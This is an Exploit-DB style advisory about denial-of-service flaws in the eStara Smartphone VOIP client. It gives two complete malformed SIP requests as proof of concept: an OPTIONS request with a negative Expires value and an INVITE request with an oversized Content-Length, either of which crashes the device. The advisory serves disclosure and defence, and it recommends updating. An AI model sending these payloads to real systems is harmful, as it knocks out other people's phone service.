eStara Smartphone Denial-of-Service Vulnerabilities

vendor:

Smartphone

by:

SecurityFocus

7.5

CVSS

HIGH

Denial-of-Service

N/A

CWE

Product Name: Smartphone

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

eStara Smartphone Denial-of-Service Vulnerabilities

eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash. For the negative 'Expires' field issue, an attacker can send an OPTIONS request with an Expires field set to a negative value. For the 'Content-Length' field issue, an attacker can send an INVITE request with a Content-Length field set to a large value.

Mitigation:

It is recommended to update to the latest version of eStara Smartphone.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16629/info
 
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.

For the negative 'Expires' field issue:

OPTIONS sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:a@127.0.0.1>;tag=1793
To: zwell <sip:a@127.0.0.1>
Call-ID: 1407@172.16.3.6
CSeq: 5185 OPTIONS
Expires: -127

For the 'Content-Length' field issue:

INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:a@127.0.0.1>;tag=2386
To: zwell <sip:a@127.0.0.1>
Call-ID: 31442@172.16.3.6
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111

v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000